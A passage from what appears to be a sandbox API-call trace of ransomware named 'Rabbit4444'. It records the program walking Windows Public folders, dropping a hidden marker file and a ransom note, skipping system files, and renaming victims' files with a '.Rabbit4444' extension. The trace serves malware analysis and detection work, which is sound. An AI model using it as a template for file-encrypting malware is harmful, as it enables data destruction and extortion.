FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0047.955] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\public\\music\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0047.955] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0047.955] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0047.956] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0047.956] CloseHandle (hObject=0x278) returned 1 [0047.956] CloseHandle (hObject=0x27c) returned 1 [0047.957] GetCurrentThreadId () returned 0xd98 [0047.957] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6390 [0047.957] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\Public\\Libraries", iMaxLength=2048 | out: lpString1="C:\\Users\\Public\\Libraries") returned="C:\\Users\\Public\\Libraries" [0047.957] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102590 | out: hHeap=0xe0000) returned 1 [0047.957] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6388 | out: hHeap=0xe0000) returned 1 [0047.957] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Public\\Libraries" | out: lpString1="C:\\Users\\Public\\Libraries") returned="C:\\Users\\Public\\Libraries" [0047.957] lstrcatW (in: lpString1="C:\\Users\\Public\\Libraries", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Libraries\\") returned="C:\\Users\\Public\\Libraries\\" [0047.957] lstrcatW (in: lpString1="C:\\Users\\Public\\Libraries\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\Public\\Libraries\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\Public\\Libraries\\.BFC0E91B00AE8A0620D3" [0047.957] CreateFileW (lpFileName="C:\\Users\\Public\\Libraries\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\public\\libraries\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0047.961] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0047.963] FlushFileBuffers (hFile=0x27c) returned 1 [0047.964] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Libraries\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0047.965] CloseHandle (hObject=0x27c) returned 1 [0047.965] lstrlenW (lpString="C:\\Users\\Public\\Libraries") returned 25 [0047.965] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0047.965] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Libraries\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x17d53e9c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb207547d, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xe5e8b15e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1027d0 [0047.965] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.965] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0047.965] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0047.965] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0047.965] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x17d53e9c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb207547d, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xe5e8b15e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.965] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.965] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0047.965] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0047.966] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0047.966] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0047.966] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe5e8b15e, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe5e8b15e, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe5e8b15e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0047.966] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.966] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0047.966] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fdc52c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xaf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0047.966] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.966] lstrcmpiW (lpString1="desktop.ini", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.966] lstrcmpiW (lpString1="desktop.ini", lpString2="Rabbit4444.exe") returned -1 [0047.966] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0047.966] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0047.966] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0047.966] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0047.966] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0047.966] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0047.966] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0047.966] lstrcmpiW (lpString1="desktop.ini", lpString2="NTUSER.DAT") returned -1 [0047.966] lstrcpyW (in: lpString1=0x130eb6c, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0047.966] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Libraries\\desktop.ini", dwFileAttributes=0x22) returned 1 [0047.966] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Libraries\\desktop.ini", dwFileAttributes=0x6) returned 1 [0047.966] lstrlenW (lpString="desktop.ini") returned 11 [0047.966] lstrlenW (lpString="Rabbit4444") returned 10 [0047.966] lstrcmpiW (lpString1="esktop.ini", lpString2="Rabbit4444") returned -1 [0047.966] lstrlenW (lpString=".dll") returned 4 [0047.967] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0047.967] lstrlenW (lpString=".lnk") returned 4 [0047.967] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0047.967] lstrlenW (lpString=".ini") returned 4 [0047.967] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0047.967] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3816851, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97421a72, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97421a72, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3c0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecordedTV.library-ms", cAlternateFileName="RECORD~1.LIB")) returned 1 [0047.967] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0047.967] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.967] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="Rabbit4444.exe") returned 1 [0047.967] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2=".") returned 1 [0047.967] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="..") returned 1 [0047.967] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="windows") returned -1 [0047.967] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="bootmgr") returned 1 [0047.967] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="pagefile.sys") returned 1 [0047.967] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="boot") returned 1 [0047.967] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="ids.txt") returned 1 [0047.967] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="NTUSER.DAT") returned 1 [0047.967] lstrcpyW (in: lpString1=0x130eb6c, lpString2="RecordedTV.library-ms" | out: lpString1="RecordedTV.library-ms") returned="RecordedTV.library-ms" [0047.967] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms", dwFileAttributes=0x0) returned 1 [0047.968] lstrlenW (lpString="RecordedTV.library-ms") returned 21 [0047.968] lstrlenW (lpString="Rabbit4444") returned 10 [0047.968] lstrcmpiW (lpString1="library-ms", lpString2="Rabbit4444") returned -1 [0047.968] lstrlenW (lpString=".dll") returned 4 [0047.968] lstrcmpiW (lpString1="y-ms", lpString2=".dll") returned 1 [0047.968] lstrlenW (lpString=".lnk") returned 4 [0047.968] lstrcmpiW (lpString1="y-ms", lpString2=".lnk") returned 1 [0047.968] lstrlenW (lpString=".ini") returned 4 [0047.968] lstrcmpiW (lpString1="y-ms", lpString2=".ini") returned 1 [0047.968] lstrlenW (lpString=".sys") returned 4 [0047.968] lstrcmpiW (lpString1="y-ms", lpString2=".sys") returned 1 [0047.968] CreateFileW (lpFileName="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0047.968] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0047.968] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13927875611) returned 1 [0047.968] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=960) returned 1 [0047.968] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0047.968] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0047.968] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6c0, lpName=0x0) returned 0x298 [0047.969] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6c0) returned 0x70000 [0047.970] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0047.970] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0047.970] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0047.970] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0047.970] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0047.970] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0047.970] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0047.970] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0047.970] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13928124353) returned 1 [0047.971] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0047.971] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0047.971] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0047.971] CloseHandle (hObject=0x298) returned 1 [0047.971] CloseHandle (hObject=0x278) returned 1 [0047.972] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms.Rabbit4444") returned 58 [0047.972] MoveFileExW (lpExistingFileName="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms"), lpNewFileName="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms.Rabbit4444" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms.rabbit4444"), dwFlags=0x1) returned 1 [0047.973] InterlockedExchangeAdd (in: Addend=0xff618, Value=960 | out: Addend=0xff618) returned 15207760 [0047.973] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3305 [0047.973] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3816851, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97421a72, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97421a72, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3c0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecordedTV.library-ms", cAlternateFileName="RECORD~1.LIB")) returned 0 [0047.973] FindClose (in: hFindFile=0x1027d0 | out: hFindFile=0x1027d0) returned 1 [0047.973] lstrcpyW (in: lpString1=0x130eb6c, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0047.973] CreateFileW (lpFileName="C:\\Users\\Public\\Libraries\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\public\\libraries\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0047.973] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0047.973] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0047.974] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0047.974] CloseHandle (hObject=0x278) returned 1 [0047.974] CloseHandle (hObject=0x27c) returned 1 [0047.975] GetCurrentThreadId () returned 0xd98 [0047.975] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6590 [0047.975] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\Public\\Downloads", iMaxLength=2048 | out: lpString1="C:\\Users\\Public\\Downloads") returned="C:\\Users\\Public\\Downloads" [0047.975] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102750 | out: hHeap=0xe0000) returned 1 [0047.975] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6588 | out: hHeap=0xe0000) returned 1 [0047.975] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Public\\Downloads" | out: lpString1="C:\\Users\\Public\\Downloads") returned="C:\\Users\\Public\\Downloads" [0047.975] lstrcatW (in: lpString1="C:\\Users\\Public\\Downloads", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Downloads\\") returned="C:\\Users\\Public\\Downloads\\" [0047.975] lstrcatW (in: lpString1="C:\\Users\\Public\\Downloads\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\Public\\Downloads\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\Public\\Downloads\\.BFC0E91B00AE8A0620D3" [0047.975] CreateFileW (lpFileName="C:\\Users\\Public\\Downloads\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\public\\downloads\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0047.976] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0047.979] FlushFileBuffers (hFile=0x27c) returned 1 [0047.980] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Downloads\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0047.980] CloseHandle (hObject=0x27c) returned 1 [0047.981] lstrlenW (lpString="C:\\Users\\Public\\Downloads") returned 25 [0047.981] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0047.981] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Downloads\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466cad2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe5eb1449, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0047.981] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.981] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0047.981] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0047.981] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0047.981] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466cad2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe5eb1449, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.981] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.981] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0047.981] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0047.981] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0047.981] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0047.981] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe5eb1449, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe5eb1449, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe5eb1449, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0047.981] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.981] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0047.981] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fb62ca, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0047.981] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.981] lstrcmpiW (lpString1="desktop.ini", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.981] lstrcmpiW (lpString1="desktop.ini", lpString2="Rabbit4444.exe") returned -1 [0047.981] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0047.981] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0047.981] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0047.981] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0047.981] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0047.982] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0047.982] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0047.982] lstrcmpiW (lpString1="desktop.ini", lpString2="NTUSER.DAT") returned -1 [0047.982] lstrcpyW (in: lpString1=0x130eb6c, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0047.982] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Downloads\\desktop.ini", dwFileAttributes=0x22) returned 1 [0047.982] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Downloads\\desktop.ini", dwFileAttributes=0x6) returned 1 [0047.982] lstrlenW (lpString="desktop.ini") returned 11 [0047.982] lstrlenW (lpString="Rabbit4444") returned 10 [0047.982] lstrcmpiW (lpString1="esktop.ini", lpString2="Rabbit4444") returned -1 [0047.982] lstrlenW (lpString=".dll") returned 4 [0047.982] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0047.982] lstrlenW (lpString=".lnk") returned 4 [0047.982] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0047.982] lstrlenW (lpString=".ini") returned 4 [0047.982] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0047.982] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fb62ca, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0047.982] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0047.983] lstrcpyW (in: lpString1=0x130eb6c, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0047.983] CreateFileW (lpFileName="C:\\Users\\Public\\Downloads\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\public\\downloads\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0047.984] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0047.985] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0047.985] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0047.985] CloseHandle (hObject=0x278) returned 1 [0047.985] CloseHandle (hObject=0x27c) returned 1 [0047.986] GetCurrentThreadId () returned 0xd98 [0047.986] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6370 [0047.986] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\Public\\Documents", iMaxLength=2048 | out: lpString1="C:\\Users\\Public\\Documents") returned="C:\\Users\\Public\\Documents" [0047.986] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102510 | out: hHeap=0xe0000) returned 1 [0047.986] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6368 | out: hHeap=0xe0000) returned 1 [0047.986] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Public\\Documents" | out: lpString1="C:\\Users\\Public\\Documents") returned="C:\\Users\\Public\\Documents" [0047.986] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Documents\\") returned="C:\\Users\\Public\\Documents\\" [0047.986] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\Public\\Documents\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\Public\\Documents\\.BFC0E91B00AE8A0620D3" [0047.986] CreateFileW (lpFileName="C:\\Users\\Public\\Documents\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\public\\documents\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0047.988] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0047.991] FlushFileBuffers (hFile=0x27c) returned 1 [0047.992] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Documents\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0047.992] CloseHandle (hObject=0x27c) returned 1 [0047.993] lstrlenW (lpString="C:\\Users\\Public\\Documents") returned 25 [0047.993] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0047.993] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc4d01, 